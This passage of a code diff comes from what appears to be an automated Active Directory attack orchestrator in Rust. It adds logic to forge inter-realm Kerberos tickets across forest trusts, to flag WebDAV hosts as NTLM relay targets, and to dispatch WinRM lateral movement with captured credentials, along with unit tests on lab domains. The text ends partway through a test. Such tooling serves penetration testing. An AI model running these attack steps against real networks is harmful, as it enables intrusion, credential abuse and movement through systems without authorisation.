unknown, attempting forge with empty SID" + ); + } + + let mut tool_args = serde_json::json!({ + "trust_key": trust_key, + "source_sid": source_sid, + "source_domain": source_domain, + "target_domain": target_domain, + "username": ticket_username, + }); + if let Some(aes) = aes_key { + tool_args["aes_key"] = serde_json::json!(aes); + } + + // Look up the target DC so the tool can chain ldap/ + cifs/ + // service-ticket fetches into the same ccache. MIT GSSAPI clients can't + // walk a referral starting from `krbtgt/@`; they require + // the service ticket to already be cached. Without this, the forged + // inter-realm TGT is unusable for `ldapsearch -Y GSSAPI`. + { + let s = dispatcher.state.read().await; + let target_lower = target_domain.to_lowercase(); + if let Some(dc_ip) = s.resolve_dc_ip(target_domain) { + let dc_fqdn = s.hosts.iter().find_map(|h| { + if h.ip != dc_ip || h.hostname.is_empty() { + return None; + } + let hn = h.hostname.to_lowercase(); + if hn.ends_with(&format!(".{target_lower}")) || hn == target_lower { + Some(hn) + } else { + Some(format!("{hn}.{target_lower}")) + } + }); + if let Some(fqdn) = dc_fqdn { + tool_args["target_dc_ip"] = serde_json::json!(dc_ip); + tool_args["target_dc_fqdn"] = serde_json::json!(fqdn); + } + } + } + + let call = ToolCall { + id: format!("create_inter_realm_{}", uuid::Uuid::new_v4().simple()), + name: "create_inter_realm_ticket".to_string(), + arguments: tool_args, + }; + let task_id = format!( + "inter_realm_ticket_{}", + &uuid::Uuid::new_v4().simple().to_string()[..12] + ); + + tracing::info!( + source_domain, + target_domain, + task_id = %task_id, + args = %call.arguments, + "Dispatching create_inter_realm_ticket for SID-filtered trust (Kerberos LDAP path)" + ); + + match dispatcher + .llm_runner + .tool_dispatcher() + .dispatch_tool("privesc", &task_id, &call) + .await + { + Ok(result) => { + if result.error.is_some() { + tracing::warn!( + source_domain, + target_domain, + error = ?result.error, + "create_inter_realm_ticket returned error" + ); + return; + } + // Parse the ticket path from the tool output (ARES_TICKET_PATH=). + let ticket_path = result + .output + .lines() + .find_map(|line| line.strip_prefix("ARES_TICKET_PATH=")) + .map(str::trim) + .filter(|p| !p.is_empty()) + .map(str::to_string); + + let Some(ticket_path) = ticket_path else { + tracing::warn!( + source_domain, + target_domain, + "create_inter_realm_ticket succeeded but no ARES_TICKET_PATH in output" + ); + return; + }; + + tracing::info!( + source_domain, + target_domain, + ticket_path = %ticket_path, + output_tail = %result.output.lines().rev().take(20).collect::>().into_iter().rev().collect::>().join(" | "), + "Inter-realm ticket forged — persisting for Kerberos LDAP tools" + ); + + let ticket = ares_core::models::KerberosTicket { + source_domain: source_domain.to_string(), + target_domain: target_domain.to_string(), + username: ticket_username.to_string(), + ticket_path, + forged_at: Some(chrono::Utc::now()), + }; + let _ = dispatcher + .state + .publish_kerberos_ticket(&dispatcher.queue, ticket) + .await; + + // Without a follow-up dispatch the ticket sits idle: the foreign + // forest has no credentials in state, so `auto_cross_forest_enum` + // skips it (best_cred returns None), and no LDAP-bind tool ever + // runs against the target DC. Kick off a cross-forest user-enum + // task here so the credential resolver injects the freshly-forged + // ticket and `ldap_search`/`ldap_search_descriptions` actually + // populates `state.users` for the target domain. + dispatch_post_ticket_user_enumeration(dispatcher, source_domain, target_domain).await; + } + Err(e) => { + tracing::warn!( + source_domain, + target_domain, + err = %e, + "create_inter_realm_ticket dispatch error" + ); + } + } } #[cfg(test)] @@ -958,4 +2480,114 @@ mod tests { assert_eq!(trust_enum_dedup_key("", false), "trust_enum:"); assert_eq!(trust_enum_dedup_key("", true), "trust_enum_hash:"); } + + // is_filtered_inter_forest_trust + + fn state_with_trust(domain: &str, trust: ares_core::models::TrustInfo) -> StateInner { + let mut s = StateInner::new("op-test".into()); + s.trusted_domains.insert(domain.to_lowercase(), trust); + s + } + + #[test] + fn filtered_inter_forest_intra_forest_returns_false() { + let s = StateInner::new("op-test".into()); + // child↔parent — not inter-forest, never filtered. + assert!(!is_filtered_inter_forest_trust( + &s, + "child.contoso.local", + "contoso.local" + )); + } + + #[test] + fn filtered_inter_forest_explicit_filtering_on() { + let trust = ares_core::models::TrustInfo { + domain: "fabrikam.local".into(), + flat_name: "FABRIKAM".into(), + direction: "bidirectional".into(), + trust_type: "forest".into(), + sid_filtering: true, + }; + let s = state_with_trust("fabrikam.local", trust); + assert!(is_filtered_inter_forest_trust( + &s, + "contoso.local", + "fabrikam.local" + )); + } + + #[test] + fn filtered_inter_forest_explicit_filtering_off() { + let trust = ares_core::models::TrustInfo { + domain: "fabrikam.local".into(), + flat_name: "FABRIKAM".into(), + direction: "bidirectional".into(), + trust_type: "forest".into(), + sid_filtering: false, + }; + let s = state_with_trust("fabrikam.local", trust); + assert!(!is_filtered_inter_forest_trust( + &s, + "contoso.local", + "fabrikam.local" + )); + } + + #[test] + fn filtered_inter_forest_no_metadata_tries_forge() { + let s = StateInner::new("op-test".into()); + // No TrustInfo for the target. Without explicit filtering metadata we + // try the forge — the cost of an unnecessary attempt (~30s) is cheaper + // than silently dropping a valid attack on a misconfigured trust. + assert!(!is_filtered_inter_forest_trust( + &s, + "contoso.local", + "fabrikam.local" + )); + } + + #[test] + fn filtered_inter_forest_ignores_unrelated_source_metadata() { + // Repro of op-20260429-111016 bug: child discovered its parent trust + // and stored TrustInfo{ domain="contoso.local", parent_child, + // sid_filtering=false }. Querying the unrelated cross-forest path + // contoso.local → fabrikam.local must NOT be answered with that + // parent_child entry (which would wrongly classify the cross-forest + // path as intra-forest). With no metadata for the actual target we + // now try the forge rather than silently suppressing it. + let parent_trust = ares_core::models::TrustInfo { + domain: "contoso.local".into(), + flat_name: "CONTOSO".into(), + direction: "bidirectional".into(), + trust_type: "parent_child".into(), + sid_filtering: false, + }; + let s = state_with_trust("contoso.local", parent_trust); + // Target fabrikam.local has no metadata — try the forge. + assert!(!is_filtered_inter_forest_trust( + &s, + "contoso.local", + "fabrikam.local" + )); + } + + #[test] + fn filtered_inter_forest_target_metadata_authoritative() { + // When the target's TrustInfo says cross-forest with SID filtering, + // suppress the forge regardless of any source-side parent_child entry. + let target_trust = ares_core::models::TrustInfo { + domain: "fabrikam.local".into(), + flat_name: "FABRIKAM".into(), + direction: "bidirectional".into(), + trust_type: "forest".into(), + sid_filtering: true, + }; + let s = state_with_trust("fabrikam.local", target_trust); + assert!(is_filtered_inter_forest_trust( + &s, + "contoso.local", + "fabrikam.local" + )); + } } diff --git a/ares-cli/src/orchestrator/automation/webdav_detection.rs b/ares-cli/src/orchestrator/automation/webdav_detection.rs new file mode 100644 index 00000000..f5e29c67 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/webdav_detection.rs @@ -0,0 +1,699 @@ +//! auto_webdav_detection -- detect WebDAV on hosts for NTLM relay. +//! +//! Hosts running WebClient service (WebDAV) accept HTTP-based NTLM auth, +//! which bypasses SMB signing requirements. This enables relay attacks +//! (HTTP→LDAP/SMB) even when SMB signing is enforced. WebDAV is commonly +//! enabled on IIS servers and member servers with WebClient service. +//! +//! This is a bridge module (like smb_signing.rs): it checks discovered hosts +//! for WebDAV indicators and registers `webdav_enabled` vulnerabilities +//! that downstream modules (ntlm_relay) can target. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::state::*; + +/// Collect WebDAV work items from state (pure logic, no async). +fn collect_webdav_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for host in &state.hosts { + // Skip DCs (WebDAV relay is for member servers) + if host.is_dc { + continue; + } + + // Check if host has WebDAV indicators in services + let has_webdav = host.services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + + if !has_webdav { + continue; + } + + let dedup_key = format!("webdav:{}", host.ip); + if state.is_processed(DEDUP_WEBDAV_DETECTION, &dedup_key) { + continue; + } + + // Check if vuln already registered + let vuln_id = format!("webdav_enabled_{}", host.ip.replace('.', "_")); + if state.discovered_vulnerabilities.contains_key(&vuln_id) { + continue; + } + + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain) + .or_else(|| state.credentials.first()) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(WebDavWork { + dedup_key, + vuln_id, + target_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +use crate::orchestrator::dispatcher::Dispatcher; + +/// Checks discovered hosts for WebDAV service and registers vulnerabilities. +/// Interval: 45s. +pub async fn auto_webdav_detection( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("webdav_detection") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_webdav_work(&state) + }; + + for item in work { + // Dispatch a recon task to verify WebDAV is accessible + let payload = json!({ + "technique": "webdav_check", + "target_ip": item.target_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("webdav_detection"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %item.target_ip, + hostname = %item.hostname, + "WebDAV detection check dispatched" + ); + + // Also register the vuln proactively (service tag is strong signal) + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: item.vuln_id, + vuln_type: "webdav_enabled".to_string(), + target: item.target_ip.clone(), + discovered_by: "auto_webdav_detection".to_string(), + discovered_at: chrono::Utc::now(), + details: { + let mut d = std::collections::HashMap::new(); + d.insert( + "hostname".to_string(), + serde_json::Value::String(item.hostname.clone()), + ); + d.insert( + "domain".to_string(), + serde_json::Value::String(item.domain.clone()), + ); + d.insert( + "target_ip".to_string(), + serde_json::Value::String(item.target_ip.clone()), + ); + d + }, + recommended_agent: "coercion".to_string(), + priority: 4, + }; + + let _ = dispatcher + .state + .publish_vulnerability_with_strategy( + &dispatcher.queue, + vuln, + Some(&dispatcher.config.strategy), + ) + .await; + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_WEBDAV_DETECTION, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_WEBDAV_DETECTION, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(target = %item.target_ip, "WebDAV detection deferred"); + } + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to dispatch WebDAV detection"); + } + } + } + } +} + +struct WebDavWork { + dedup_key: String, + vuln_id: String, + target_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("webdav:{}", "192.168.58.22"); + assert_eq!(key, "webdav:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_WEBDAV_DETECTION, "webdav_detection"); + } + + #[test] + fn webdav_service_detection_webdav() { + let services = ["80/tcp webdav".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(has_webdav); + } + + #[test] + fn webdav_service_detection_iis() { + let services = ["80/tcp iis httpd".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(has_webdav); + } + + #[test] + fn webdav_service_detection_http() { + let services = ["80/tcp http".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(has_webdav); + } + + #[test] + fn no_webdav_service() { + let services = [ + "445/tcp microsoft-ds".to_string(), + "3389/tcp ms-wbt-server".to_string(), + ]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(!has_webdav); + } + + #[test] + fn vuln_id_format() { + let ip = "192.168.58.22"; + let vuln_id = format!("webdav_enabled_{}", ip.replace('.', "_")); + assert_eq!(vuln_id, "webdav_enabled_192_168_58_22"); + } + + #[test] + fn domain_from_hostname() { + let hostname = "web01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn webdav_service_detection_webclient() { + let services = ["WebClient service running".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(has_webdav); + } + + #[test] + fn webdav_service_detection_case_insensitive() { + let services = ["80/TCP WEBDAV".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(has_webdav); + } + + #[test] + fn webdav_service_not_port_80_without_http() { + // Port 80 alone without "http" keyword should not match + let services = ["80/tcp other_service".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(!has_webdav); + } + + #[test] + fn domain_from_hostname_bare() { + let hostname = "web01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn domain_from_hostname_subdomain() { + let hostname = "web01.child.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "child.contoso.local"); + } + + #[test] + fn vuln_id_format_various_ips() { + let ips = ["192.168.58.10", "192.168.58.22", "192.168.58.240"]; + for ip in ips { + let vuln_id = format!("webdav_enabled_{}", ip.replace('.', "_")); + assert!(vuln_id.starts_with("webdav_enabled_")); + assert!(!vuln_id.contains('.')); + } + } + + #[test] + fn credential_domain_matching() { + let domain = "contoso.local".to_string(); + let cred_domain = "CONTOSO.LOCAL"; + assert_eq!(cred_domain.to_lowercase(), domain); + } + + #[test] + fn credential_domain_matching_empty_domain() { + let domain = "".to_string(); + let cred_domain = "contoso.local"; + // When domain is empty, the first branch should fail and fall through + let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain; + assert!(!matches); + } + + #[test] + fn webdav_vuln_details_construction() { + let hostname = "web01.contoso.local".to_string(); + let domain = "contoso.local".to_string(); + let target_ip = "192.168.58.22".to_string(); + let mut d = std::collections::HashMap::new(); + d.insert( + "hostname".to_string(), + serde_json::Value::String(hostname.clone()), + ); + d.insert( + "domain".to_string(), + serde_json::Value::String(domain.clone()), + ); + d.insert( + "target_ip".to_string(), + serde_json::Value::String(target_ip.clone()), + ); + assert_eq!(d.len(), 3); + assert_eq!(d["hostname"], serde_json::json!("web01.contoso.local")); + assert_eq!(d["domain"], serde_json::json!("contoso.local")); + assert_eq!(d["target_ip"], serde_json::json!("192.168.58.22")); + } + + #[test] + fn webdav_payload_structure() { + let payload = serde_json::json!({ + "technique": "webdav_check", + "target_ip": "192.168.58.22", + "hostname": "web01.contoso.local", + "domain": "contoso.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + assert_eq!(payload["technique"], "webdav_check"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["hostname"], "web01.contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + } + + #[test] + fn empty_services_no_webdav() { + let services: Vec = vec![]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(!has_webdav); + } + + // --- collect_webdav_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_host( + ip: &str, + hostname: &str, + is_dc: bool, + services: Vec, + ) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services, + is_dc, + owned: false, + } + } + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_host_with_webdav_and_creds_produces_work() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + assert_eq!(work[0].hostname, "web01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dedup_key, "webdav:192.168.58.22"); + assert_eq!(work[0].vuln_id, "webdav_enabled_192_168_58_22"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_dc_hosts() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + true, + vec!["80/tcp webdav".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_host_without_webdav_services() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["445/tcp microsoft-ds".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_WEBDAV_DETECTION, "webdav:192.168.58.22".into()); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_already_registered_vuln() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + state.discovered_vulnerabilities.insert( + "webdav_enabled_192_168_58_22".to_string(), + ares_core::models::VulnerabilityInfo { + vuln_id: "webdav_enabled_192_168_58_22".to_string(), + vuln_type: "webdav_enabled".to_string(), + target: "192.168.58.22".to_string(), + discovered_by: "test".to_string(), + discovered_at: chrono::Utc::now(), + details: std::collections::HashMap::new(), + recommended_agent: "coercion".to_string(), + priority: 4, + }, + ); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_extracts_domain_from_hostname() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.30", + "web01.fabrikam.local", + false, + vec!["80/tcp iis httpd".to_string()], + )); + state + .credentials + .push(make_cred("svc_web", "fabrikam.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["WebClient service running".to_string()], + )); + // First cred is fabrikam, second is contoso (matching host domain) + state + .credentials + .push(make_cred("user_fab", "fabrikam.local")); + state + .credentials + .push(make_cred("user_con", "contoso.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "user_con"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_cred_when_no_domain_match() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + // Only fabrikam creds, host is contoso + state + .credentials + .push(make_cred("user_fab", "fabrikam.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "user_fab"); + } + + #[test] + fn collect_bare_hostname_falls_back_to_first_cred() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01", + false, + vec!["80/tcp webdav".to_string()], + )); + state + .credentials + .push(make_cred("fallback_user", "contoso.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 1); + // bare hostname has empty domain, so domain match fails; falls back to first + assert_eq!(work[0].credential.username, "fallback_user"); + assert_eq!(work[0].domain, ""); + } + + #[test] + fn collect_multiple_hosts_mixed() { + let mut state = StateInner::new("test".into()); + // Good: member server with webdav + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + // Skipped: DC + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + true, + vec!["80/tcp webdav".to_string()], + )); + // Skipped: no webdav service + state.hosts.push(make_host( + "192.168.58.40", + "sql01.contoso.local", + false, + vec!["1433/tcp ms-sql-s".to_string()], + )); + // Good: IIS server + state.hosts.push(make_host( + "192.168.58.50", + "ws01.fabrikam.local", + false, + vec!["80/tcp iis httpd".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 2); + assert_eq!(work[0].target_ip, "192.168.58.22"); + assert_eq!(work[1].target_ip, "192.168.58.50"); + } +} diff --git a/ares-cli/src/orchestrator/automation/winrm_lateral.rs b/ares-cli/src/orchestrator/automation/winrm_lateral.rs new file mode 100644 index 00000000..ffa42ab6 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/winrm_lateral.rs @@ -0,0 +1,537 @@ +//! auto_winrm_lateral -- attempt WinRM lateral movement with owned credentials. +//! +//! WinRM (port 5985/5986) is a common lateral movement vector in AD environments. +//! evil-winrm provides PowerShell remoting access when credentials are valid and +//! the user has remote management rights. This module dispatches WinRM access +//! attempts against hosts where we have credentials but haven't tried WinRM yet. +//! +//! WinRM complements SMB-based lateral movement (psexec/wmiexec) by working even +//! when SMB is restricted or firewall-filtered. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect WinRM lateral movement work items from current state. +/// +/// Pure logic extracted from `auto_winrm_lateral` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_winrm_lateral_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for host in &state.hosts { + // Check if host has WinRM indicators in services + let has_winrm = host.services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + + if !has_winrm { + continue; + } + + // Skip hosts we already own via secretsdump + if state.is_processed(DEDUP_SECRETSDUMP, &host.ip) { + continue; + } + + let dedup_key = format!("winrm:{}", host.ip); + if state.is_processed(DEDUP_WINRM_LATERAL, &dedup_key) { + continue; + } + + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain) + .or_else(|| state.credentials.first()) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(WinRmWork { + dedup_key, + target_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +/// Attempts WinRM lateral movement against hosts with owned credentials. +/// Interval: 45s. +pub async fn auto_winrm_lateral(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("winrm_lateral") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_winrm_lateral_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "winrm_exec", + "target_ip": item.target_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("winrm_lateral"); + match dispatcher + .throttled_submit("lateral", "lateral", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %item.target_ip, + hostname = %item.hostname, + "WinRM lateral movement dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_WINRM_LATERAL, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_WINRM_LATERAL, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(target = %item.target_ip, "WinRM lateral deferred"); + } + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to dispatch WinRM lateral"); + } + } + } + } +} + +struct WinRmWork { + dedup_key: String, + target_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + use ares_core::models::{Credential, Host}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str, services: Vec) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services, + is_dc: false, + owned: false, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("winrm:{}", "192.168.58.22"); + assert_eq!(key, "winrm:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_WINRM_LATERAL, "winrm_lateral"); + } + + #[test] + fn winrm_service_detection() { + let services = [ + "5985/tcp microsoft-httpapi".to_string(), + "445/tcp microsoft-ds".to_string(), + ]; + let has_winrm = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + assert!(has_winrm); + } + + #[test] + fn winrm_https_service_detection() { + let services = ["5986/tcp ssl/http".to_string()]; + let has_winrm = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + assert!(has_winrm); + } + + #[test] + fn no_winrm_service() { + let services = [ + "445/tcp microsoft-ds".to_string(), + "3389/tcp ms-wbt-server".to_string(), + ]; + let has_winrm = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + assert!(!has_winrm); + } + + #[test] + fn domain_from_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "srv01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "winrm_exec", + "target_ip": "192.168.58.30", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "winrm_exec"); + assert_eq!(payload["target_ip"], "192.168.58.30"); + assert_eq!(payload["hostname"], "srv01.contoso.local"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = WinRmWork { + dedup_key: "winrm:192.168.58.30".into(), + target_ip: "192.168.58.30".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + credential: cred, + }; + + 